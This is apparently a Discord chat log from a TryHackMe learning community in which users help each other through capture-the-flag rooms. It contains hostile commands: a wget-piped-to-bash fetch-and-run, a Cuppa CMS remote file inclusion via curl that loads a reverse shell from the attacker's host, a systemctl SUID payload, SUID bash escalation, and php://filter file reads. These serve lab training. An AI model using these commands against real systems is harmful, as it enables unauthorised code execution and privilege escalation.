Thanks, mate. Now it's time to skin the cat another way (SUDO)

Gave +1 Rep to @forest robin

@white salmon grats!!

once you learn that sudo method i bet it will be viable exploit path on most THM boxes 😛

I have a feeling there are a few ways how to skin this cat

Fascinating stuff. Since I started a few days ago not to use walkthroughs anymore I've been spending so much time googling around. Literally hours...
I guess if not for this server I would need the walkthroughs...

@white salmon thats good, basically what im doing. learning 100000 ways NOT to do the box lol, but all that reading and learning is gonna help you in the long run

something you read while doing this box, will help you solve the next one faster

@forest robin what does -p after bash do?

so...take this with a grain of salt lol i could be wrong...but with /bin/bash -p runs bash and pulls ENV variables

so the setuid bash will lpull the root ENV variables

if you do without -p it just runs bash without pulling ENV

you can confirm this by running the suid bash with and without -p each time doing echo $ENV

redteamrecon
having issues adding a key for censys_email_address
[!] 'censysio_id' key not set. censysio module will likely fail at runtime. See 'keys add'.
[12:30 AM]
[recon-ng][thmredteam.com] > keys add
Adds/Updates a third party resource credential

Usage: keys add <name> <value>

[recon-ng][thmredteam.com] > keys add this 1
[*] Key 'this' added.
[12:30 AM]
lol
[12:30 AM]
I'm sure there's more to it but don't yet know what

Any ideas

printenv maybe? I tried echo $ENV and no output (both shells)

yeah that one 😛

yeah echo $ENV does nothing lol

the only difference is SHLVL

@forest robin

i did say take what i was saying with a grain of salt 😛

sorry if this is off-topic, but to interesting to me :)

it is interesting, also good to understand the mechanics behind it

looking at the man bash page -p is short for --posix

in this mode, interactive shells expand the ENV variable and commands are read and executed from
If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, no startup files are read, shell functions are not inherited from the environment, the SHEL‐
LOPTS, BASHOPTS, CDPATH, and GLOBIGNORE variables, if they appear in the environment, are ignored, and the effective user id is set to the real user id

little cut off lol

looks like without -p, if the effective group id does not equal the actual group id then the effective group id is reset to the actual group id

if -p is supplied then then no reset takes place...and suid sets the effective group id to 0...so without -p, the user's actual group id wont match the suid group id and thus the effective group is reset to the actual one

Yes. And this is the case here. RUID is drac and EUID is root.

Fascinating, again.

ya so in that case the egid and the gid dont match so without -p the egid gets reset to the gid

Hm. And that would be the case with every suid, I guess.

i understood fundamentally what was going on, but now i really understand whats happening. @white salmon thanks for taking me down this yellow brick road 🙂

Gave +1 Rep to @versed shadow

@white salmon based on what the man page for bash says...i dont know about every suid binary though

probably some of them dont have -p (or equivalent)

@white salmon /bin/dash suid doesnt have -p flag and suid exploit is just: dash
so maybe that egid vs gid check only happens in bash (just only looked at /bin/dash so far)

I still need to digest all this. This room was a lot of information 😵‍💫 I am trying to understand it in a way that other bins are only executed once whereas bash sets an environment for all commands executed within it and therefore this gid/egid conflict needs to get solved.

Tell me your thoughts...

hrm...bash is like a VM? in that when you run bash, it sets up its own environment that is just for that bash ...vs like a vim suid, which uses the 'host' (to keep the VM analogy going)

Not...... at all, really.

That's my feeling :)) Maybe some Linux Guru could clarify this more :)

So a shell starts up, and pulls in shell config data, like environment variables that tell it where to look for stuff like executables.

a VM is much more segmented than that

A shell doesnt' reserve big chunks of disk or memory or other hardware resources for its specific use

lol right on call 🙂

@umbral umbrai wasnt making a direct comparison to a VM, was trying to come up with an effective analogy and thats all i could come up with

the shell is the environment you work in to do stuff; opening a new shell usually doesn't pull in anything other than the standard config stuff, usually stored as a hidden file on your home folder

The original question was, why a bash suid needs -p and others don't.

@forest robin correct me

yah looking at other shell types on gftobins under the suid...only bash has the -p, the rest just run the shell

@umbral umbra

each shell is a different program, and interact differently with the user

it's like expecting windows cmd.exe and PowerShell to be interchangeable

the commands might be similar, but they are written in different ways

@umbral umbra so why if a suid launches a shell you would not need the -p flag after the bash bin, whereas if you want to run a /bin/bash suid as root you need to add -p? I am not 100% clear

I was reading 2 or 3 times through that now and I'm not sure if I fully understand yet. But from what I understand, it's about effective UID(the one the SUID bit is set to) and the real UID(the one of the user who started that process). So when you not supply the -p flag, it's going to set the effective UID to the real UID, which will result in getting a bash shell as the user who started that process. I could be partially or even totally wrong, but that's my interpretation of what I read so far, but if anyone can correct me I'm more then happy to get a better explanation. So maybe you want to check that out yourself:
https://stackoverflow.com/questions/32455684/difference-between-real-user-id-effective-user-id-and-saved-user-id
https://unix.stackexchange.com/questions/116792/privileged-mode-in-bash

So, this is along the lines what @forest robin wrote before. Thanks for the links! My question is still, why is the -p flag necessary only when running bash and not some other SUID binary.

Gave +1 Rep to @left thunder

I still have to read what they wrote there, but I am posting this question again before I got to sleep :)

I would assume because only bash is setting the effective UID to the real UID, but that's just a hard guess.

But why? 🤓

Not sure, but in case I have an answer to that once I'll come back to you 😄

Heya! I'm doing the Linux PrivEsc room from the Jr. Pentester path, and I'm on q5, where the hint says to use wget to upload the script to the karen machine, but the karen user doesn't seem to have any kind of home directory so there doesn't seem to be anywhere the account has any write permissions, making it impossible to get the exploit script onto the machine. Any tips would be much appreciated aha

@severe rapids try /tmp

/tmp or /dev/shm might be writable

of (if this is like linenum) you could do: wget file -O - | bash

to have it piped straight into bash without touching the disk

sweet, this worked. Cheers 🙂

I'm trying to use netcat on the room what the shell and can't find a port to use with tun0

When I run an nmap scan it return that all ports are closed

Nvm I had to ssh in first

Very useful room 🙂

Hi all.

I'm just starting out on Walking an Application

I started my Attack Box but I can't open the URL for the lab. Keeps timing out.

I'm doing the very simple vulnversity and I have no idea why this payload isn't working

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash -i"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF

I got it from here https://gtfobins.github.io/gtfobins/systemctl/#suid

im on ubuntu

so I don't need to add a -p to the /bin/sh

It runs as a service, so it's not going to give you an interactive shell session

Hello, everyone! Any hints for the last flag of the "Pickle Rick"?

Did you get to see all folders in / ?

Hmm, I'll check in a moment. I might've missed something there, thank you

Gave +1 Rep to @versed shadow

guys someone that could give a little nudge on Set?

not hints just directions to possibly look at

So I would have to use it to make another revshell

That's one way

I feel like I tried a bunch of other possibilities last night

Instead of getting a shell, you can get the output of /root/root.txt

I guess I always could, but that feels too much like playing the game

Hm?

Isn't that the last task of this room?

It is, but what I feel like it's using the meta knowing that it's the last task in the room

I hear :) What about making the bash a SUID?

@serene wing

I like that, I'll get to doing that once I get home for the day

You could exploit this service to chmod +s of bash

@serene wing Np. Let us know :)

Im doing the phishing Emails 3 room and under phishing case2 the past question is really throwing me for a loop I tried all the running processes on the link provided. Im sure its right under my nose any ideas?

Last**

What windows process was flagged as Potentially Bad Traffic?

no surprise, it worked

Can you please share what you did?

I did "chown +s /bin/bash" as the payload command

I was then able to do "bush -p" to be root

Congrats :)

uhh

Discord are you ok ?

For the pickle rick room, does getting the last ingredient imply privesc?

yes

hm, interesting. Thank you!

Gave +1 Rep to @honest wagon

Can I get a hint for the box "Chill hack" ?

||I have access for the user apaar but stuck at escalating to other users also got hashes from mysql ||

Room: Terminator
||I got to the point of RFI on Cuppa CMS. || @forest robin

Can someone help with a hint?

I feel like I'm enumerating wrong, I usually go into a directory then use the ls command then go on down the directory until I see something of interest, is there a better way of enumerating?

well, "tree" makes a helpful tree of all files and subdirectories but it's mostly not installed on THM machines
and don't use ls, use ls -la as most files are hidden with .file(.ssh is almost always hidden)

Yes I always use ls with a option also tree wasn't installed but now it's gonna make my life easier

try cracking them, then!

Thank you

You're welcome!

@junior wave you can do: find .

and it will recursivly list all files (hidden as well) starting from current working directory

one of the 1st things i do when i get a shell.
sudo -l

cd home; find .

cat /etc/crontab

@white salmon got the RFI, did you put up a reverse shell?

curl http://10.20.30.40/ridiculously/long/url/to/exploit?urlConfig=http://your.local.box/shell.php

make sure you got your listener setup before doing that

once you are on the box, poke around. I have a good link for you regarding the privesc if you have trouble figuring it out

I guess I missed a step. What do you mean =http//your.XXXXXX ??? Does it not just send a GET to my Python server?!

@white salmon the =http://is yourlocalpythoinserverthatishosting/reverse_shell_code.php

the RFI

Congrats on the new colour. Much nicer with the color of your avatar

ahh lol i am back to green 😛

haha

OK

It does NOT work

I sould curl it?

Not in the browser?

1st, confirm you have paths ansd everything correct by doing the exploit path they show to grab ../../../../etc/passwd

i used curl since i was already in a terminal from starting the listener

hehe, i did that part. confirmed the exploit, then i did the RFI but somehow erased the urlConfig= part

Ha, got it!

so it was configFIeld.phphttp://whatever used curl, the browser, was getting no hits back, why isnt this working! took a break to eat lunch, came back and noticed the missing urlCOnfig= straight away...dont make my same mistake 😛

Man, I did not know you can add http I though it's just local dirs

whenever you have an LFI like this...always try to fetch something remote because why not?

I was working the whole afternoon with totally different strategy

You have a min?

trying to get a reverse shell working from within the box somehow? i did that for about 20 minutes before i realized just fetching a shell would probably be easier

yeah sure

just got on, always spend a few minutes going through channels before i get started on todays challenge

So since I did not think of that, and shadow was unreachable so I did the following

OK

If you compose an email in Squirrelmail, and I guess also in other mail clients

and you add an attachment

before you click "Send" it stored somewhere

oh wow, that may work somehow...similiar to log poisoning?

So there are default directories for that and I was trying to hit them with LFI

any luck?

I don't know what log poising is, but that was my idea for today afternoon

No :-((

the day 7 challenge from AoC. with the php-filters

you had to change your UserAgent to exploit code, then like visit a webpage so that got logged, then use an LFI (with the php://filters) to read the log file

/squirrelmail/var/local/attach/ could be or /data at the end. So then I was reading through to find where the config file for Squirrelmail is to get to the right path of the attachments directory, and then you popped up :))

i didnt ttry using any php filters on this one, most likely it would work?

Haven't done that, don't know what this is :-/

lets see if i can remember this command

Ah, like base64 encoding?

you woud do like : whateverurl/page.php?urlConfig=php://filter/convert.base64-encode/resource=/file/to/encode

you can do that to exfil php source code

Yes, the CVE had an example of that to get to some config file with a username and password

squirrelmail is php so probably to get the config file you would have to do the above method. otherwise the server will render the page and yoiu'll just get a blank page if you try to LFI it

Oh, I see

still got it up, lets try it 🙂

squirrelmail/config/config.php could be the one

and there should be a variable for the attach folder

ya /config/config.php looks rigright, there is a config/config.pl but that appears to setup everything

This is how I got to this

hrm...start simple and try to get the source for the squirrelmail/index.php

so like http://whatever/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../../../index.php

gonna have to play with those ../

Let me try.

that makes sense, you dont want sensive files accessible to the web server, even if php is gonna render the page and make it basically blank

or you know...instead of doing ../.../../index.php

do resource=alertConfigFIeld.php

already in the folder with that file so that should work?

and lol did you root the box already or just taking a detour to try something?

I use find but it doesn't give me the file path

I was looking for something like PWD does

@junior wave hrm? find . gives you the path from your cwd

Ohhh find "." Sorry I didn't see that

I'll try that next time

🙂

I am still trying to get it done with Squirrel...

can do find . -ls as well

@white salmon able to read the alertConfigField.php filed?

starting the box up so i can poke around with you

That's alertConfigField.php

ahh nice, thats the alertConfigField.php decode it to make sure, might just be returning an eror or something

What's the purpose of trying out this file? Not getting it

because LFI is trial and error, always try something super simple to make sure you are even going down a path that may work

if that url did not return base64 then we know the php://filter does not work

Got it

and trying to get the alertConfigField.php is the simplest since the exploit path is already there

so no need to fiddle with ../ pathing etc

now that we know that works, we can fiddle around and find other juicy files

now the theory is. Putting exploit code in a mail, then finding that mail and reading it, will give you a reverse shell

so now gotta find where squirrelmail stores mail, then use the LFI to read mail?

maybe send an exploit mail from dyson to dyson

so its guaranteed to be in the mailbox

I tried that already. But I am afraid that it's filled with all kind of jung around it. Therefore I thought to do it different

Compose a mail

Add an attached file (shell.php)

Do not send it yet

And now that uploaded attached file is stored somewhere

That I read already somewhere, once sent it's embedded in the email with everything else

Does this make sense?

yeah, then just find that file and use the LFI to 'read' it

which should (in theory) parse the attachment and run the exploit

hrm...except the LFI wont run the php code, just show blankness

So my first target is the config file of Squirrel to know the directory of the attachments...

Not good?!?

it should work because the exploit (alertConfigField.php) processes whatever you put in the urlConfig variable. so it processes the php if you try to LFI it (without the php://filter) and it process your shell.php from you python server

so if you can find the email and LFI it will process...only it all depends on how squirrelmail actually embeds the attachment into the email

if it embeds the attachment as ascii text it will work?

But I am not looking for an email

if it gets embedded as anything else (like base64 or even binary data) it will not work

@white salmonright your looking for the /attachments/attachment.file

?

Right, and before the email gets sent, it just sits in a folder they way you uploaded it

Once you send the email it gets embedded.

if you can find that and LFI it should work, again its 100% dependent on how squirrelmail stores that

well, not 100%? if squirremail base64'd it...you could probably use the php filter to base64 decode it before reading it

instead of doing base64-encode, do base64-decode?

did not work... also not "decode"...

But don't bother...

?

I mean, don't waste your time on my ideas. I am just playing around :)

nono, not a time waste, haha we could have discovered some kind of squirrelmail 0day

and like edison said "I haven't failed, I just found 10000 ways that don't work"

which means faster workflow next time since you know what NOT to do

Like that!
Now, I feel I don't even know where /squirrelmail is really. Have a feeling, not under root-directory.. you mentioned before something about config.pl?! did you find that file?

@forest robin

https://squirrelmail.org/docs/admin/admin-3.html

documentation always good to find file paths

could go extreme route and download squirrelmail to your system

untar it and poke around

from there docs looks like /usr/local/squirrelmail/

dunno if this helps or even on the same path your taking: https://www.exploit-db.com/exploits/41910

looks like that exploit is sending a mail to get a reverse shell

tried running it before. did not work for me. "unable to upload".

ahh

but don't take my word, I might have done it wrong.

Already did

and did you get any passwords?

yep

well, list /home and try to login as another user with those passwords (lateral move)

already tried

https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket try this for privesc

only the "Writable Docker Socket"

Hi

I'm in a room called how websites works and I need to find a way to inject a link in the HTML code.

I need a bit of guidance.

Solved it meanwhile?

Yep

I wanted to avoid watching the video

But I had to do it to see the hint where to place the code 🙂 )

I'm stuck in overpass3

I managed to || upload a webshell over ftp and get service shell, then su to paradox with the credentials from the ftp server (and then changed authorized_keys for convenience) ||

i couldn't find the service flag

but the main problem is that I can't do the horizontal privesc to james

i found the ||nfs export, but it's not accessible through remote, so i set up an ssh local forward. but when I try to mount the share it dumps me "mount.nfs: requested NFS version or transport protocol is not supported"||

I also couldn't find any obvious way to escalate to root.

hrm, havent done that room yet. but mount -t nfs --nfsvers=VERSION to specify?

i tried version 2,3 and 4, none of which work

i also tried to find the service flag with find / -uid 48 2>/dev/null | grep -v "proc" | grep -i "THM"

where id 48 is the apache user

sudo mount -t nfs --nfsvers=2 localhost:/home/james mount
mount: unrecognized option '--nfsvers=2'
Try 'mount --help' for more information.                                                                                                                               [ 3,362s ]
❯ sudo mount -t nfs -o nfsvers=2 localhost:/home/james mount
mount.nfs: requested NFS version or transport protocol is not supported                                                                                                [ 0,301s ]
❯ sudo mount -t nfs -o nfsvers=3 localhost:/home/james mount
mount.nfs: requested NFS version or transport protocol is not supported                                                                                                [ 0,289s ]
❯ sudo mount -t nfs -o nfsvers=4 localhost:/home/james mount
mount.nfs: requested NFS version or transport protocol is not supported

also nfsver=x

does nfs require rpcbind on port 111?

because I can't create a local listener for it for some reason.

sudo ssh -i overpass_key -L 111:10.10.157.76:111 paradox@10.10.157.76 -N -oStrictHostKeyChecking=no
bind [127.0.0.1]:111: Address already in use
channel_setup_fwd_listener_tcpip: cannot listen to port: 111
Could not request local forwarding.

i checked netstat -l, but port 111 doesn't show up there.

awhile ago i tried to setup a very restrictive firewall, i do recall having to open 2-3 ports for NFS to function properly

mhh

how to fix?

ss -tlnp doesnt show 111?

@deft siren and a small tip that will save you time. instead of starting another ssh session to do your port forward.
1st ssh to the box, then on a blank line type:

~C

it will drop you into an ssh> shell and you can setup port forwards

I did it

using sshuttle

cool, good to know

handy to do stuff in ssh without having to open another connection

well i have a root shell

and I still can't find that stupid flag for the web

:(

is there a better way than this?

suid_bash-4.4# cd /home/james
suid_bash-4.4# grep --recursive "thm{" 2>/dev/null
user.flag:thm{****************}
suid_bash-4.4# cd /
suid_bash-4.4# grep --recursive "thm{" 2>/dev/null | grep -v "Binary file"

hrm, try doing find / -type f -iname '*.txt' 2>/dev/null

dont look for the flag, look for the file

i tried that already. no dice

and not all flags have THM{

i have ran across several that were just a string of characters

find / -name "*.flag" -type f
/root/root.flag
/usr/share/httpd/web.flag
/home/james/user.flag

there we go

jeez

😛

-rw-r--r--. 1 root root 38 Nov 17 2020 web.flag

This flag belongs to apache

LIES!!!

that's why I didn't find it

i did find / -uid 48 2>/dev/null | grep -v "proc" and didn't find it

uid48 being apache user

@whole oyster do: john --list=formats | grep md5

you might have the baby version of john

john -h should show something like:

in one of the john the ripper rooms they mention a the top of the challenge about making sure to get the jumbo john

lemme find that, the info will be useful to you i think

https://tryhackme.com/room/johntheripper0 task 2

apt search john doesnt show jumbo, might havfe to build from source

🙂

hrm..not sure that woulld work?

you can do a symlink

like ln -s /usr/share/seclists/passwords/rockyou.txt rockyou.txt

then just go to whatever dir you ran that above command

like i do my hash cracking from /home/user/working

and in /home/user/working i have a symlink called rockyou.txt that points to /usr/share/seclists/passwords/rockyou.txt

so doing (from /home/user/working) john --wordlist=rockyou.txt hash_file works

what doesnt work about it?

ls -la, do you have a line like

head -n 5 rockyou.txt
does it show the top 5 lines of the file?

maybe that alias you set is causing an issue?

john --wordlist=rockyou.txt hash
shouldnt care if its a symlink or not

#koth